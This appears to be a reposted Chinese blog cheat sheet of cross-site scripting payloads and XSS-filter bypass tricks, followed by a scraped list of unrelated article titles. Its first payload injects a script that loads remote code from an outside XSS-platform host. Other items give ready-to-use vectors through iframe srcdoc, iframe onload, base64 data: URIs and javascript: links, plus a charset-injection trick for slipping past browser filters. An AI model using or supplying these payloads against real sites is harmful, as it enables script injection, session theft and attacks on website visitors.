xss用到的代码
来源:互联网 发布:sql 删除默认值约束 编辑:程序博客网 时间:2024/04/29 08:28
1、http://www.wooyun.org/bugs/wooyun-2013-034003
<textarea/>"><img src=1 onerror="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'"><textarea/><iframe src=http://www.baidu.com/></iframe>
2、只有数据包中http头含有X-XSS-Protection并且值为0的时候,浏览器才不会开启xss filter。
3、可以利用字符编码来绕过XSS Filter的方法,当编码是is-2022-kr时浏览器会忽略%0f,这样我们在onerror后面加个%0f就能绕过filter,前提是注入一个<meta charset=ISO-2022-KR>
4、<iframe srcdoc=
'<script>alert(1)</script>'
>
不是以on开头的 又可以执行JS的iframe属性。
5、<a href=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=>aa</a>
6、<a href=javascirpt:alert(1)>请点击</a>
7、<iframe/onload=alert(1)>
8、
1
<object data=
"data:text/html;base64,PHNjcmlwdD5hbGVydCgiWHNzVGVzdCIpOzwvc2NyaXB0Pg=="
></object>
9、一些有趣的XSS Vector
0 0
- xss用到的代码
- 经常用到的javaScript代码
- iOS 经常用到的代码
- 经常用到的代码段
- js可以用到的代码
- 处理XSS漏洞的工具类代码
- 一些很少用到但是用到时又很抓鸡的代码
- 经常用到的javaScript技术代码
- 经常用到的javaScript技术代码
- 经常用到的javaScript技术代码
- ASP.NET经常用到的代码
- 经常用到的javaScript技术代码
- 经常用到的javaScript技术代码
- 经常用到的javaScript技术代码
- 经常用到的javaScript技术代码
- 最近用到的jscript代码整理
- myspace上用到的个性代码
- 制作flash可能用到的javascript代码
- socket原理详解
- VirtualAPK:滴滴 Android 插件化的实践之路
- 深入理解SQL的四种连接-左外连接、右外连接、内连接、全连接
- shell脚本产生指定时间内的每天日期
- 如何安全退出已调用多个Activity的Application?
- xss用到的代码
- centos上面安装最新版本的git2.11版本
- Spiral Matrix II
- aaaaa
- 指针
- 操作系统概念-内核同步-原子操作
- 利用jenkins搭建发布系统
- 轨迹相似度度量
- mkdir创建目录